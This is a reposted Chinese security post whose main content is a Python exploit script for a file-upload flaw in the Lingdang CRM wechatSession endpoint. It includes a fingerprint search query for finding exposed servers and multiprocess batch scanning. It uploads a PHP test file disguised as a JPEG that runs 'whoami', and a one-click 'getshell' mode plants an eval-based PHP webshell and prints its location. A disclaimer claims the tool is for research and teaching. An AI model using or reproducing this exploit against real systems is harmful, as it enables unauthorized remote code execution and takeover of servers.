body="crmcommon/js/jquery/jquery-1.10.1.min.js"|| (body="http://localhost:8088/crm/index.php"&&body="ldcrm.base.js")
import requests
from multiprocessing import Pool
import warnings
import argparse
import re
from lxml import etree
proxy="http://127.0.0.1:7890"
warnings.filterwarnings("ignore")
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36',
'Connection': 'keep-alive',
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy'
}
def main():
argparser = argparse.ArgumentParser()
argparser.add_argument("-u", "--url",dest="target", help="url检测")
argparser.add_argument("-f", "--file",dest="file",help="批量检测")
argparser.add_argument("-exp", "--exp",dest="exp",help="一键getshell")
argparser.add_argument("-p", "--payload",dest="payload",help="shell内容")
arg=argparser.parse_args()
payload="<?php @eval($_POST[1]);?>"
target = arg.target
file = arg.file
targets = []
#if arg.exp :
if target:
#print(target)
if arg.exp:
if arg.payload:
payload = arg.payload
check(target)
getshell(target,payload)
else:
getshell(target,payload)
else:
check(target)
elif file:
try:
with open(file, "r", encoding="utf-8") as f:
target = f.readlines()
for target in target:
if "http" in target:
target = target.strip()
targets.append(target)
else:
target = "http://" + target
targets.append(target)
except Exception as e:
print("[文件错误!]")
pool = Pool(processes=30)
pool.map(check, targets)
def check(target):
#print(target)
data = """------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/jpeg
<?php system("whoami");unlink(__FILE__);?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
"""
try:
url=f"{target}/crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload"
response = requests.post(url,headers=headers,data=data, timeout=3,verify=False)
if response.status_code == 200 and "test.php" in response.text:
print(f"[*]{target}存在漏洞")
else:
print(f"[!]{target}不存在漏洞")
except Exception as e:
pass
def getshell(target,payload):
#print(target,payload)
data = f"""------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="test.php"
content-Type: image/jpeg
{payload}
------WebKitFormBoundary03rNBzFMIytvpWhy--
"""
#print(data)
try:
url=f"{target}/crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload"
response = requests.post(url,headers=headers,data=data, timeout=3,verify=False)
#print(response.text)
if response.status_code == 200 and "test.php" in response.text:
text = response.text
#text ='{"code":0,"msg":"","result":{"upload_status":false,"filepath":"D:\/ldcrm\/www\/crm\/storage\/wechatsession\/2024\/12\/20\/test.php","filename":"test.php"}}'
print(text)
match = re.findall(r"D:\\/ldcrm\\/www\\/crm\\/storage\\/wechatsession\\/(\d{4}\\/\d{2}\\/\d{2})\\/test.php", text)
print(match)
for match in match:
print(match)
print(f"[*]文件地址 http://{url}/crm/storage/wechatsession/"+match+"/test.php")
except Exception as e:
pass
if __name__ == '__main__':
main()
0x03 下载链接
https://github.com/db1235800/wechatSession-
原文始发于微信公众号(网络安全者):灵当CRM系统接口wechatSession文件上传漏洞检测利用工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论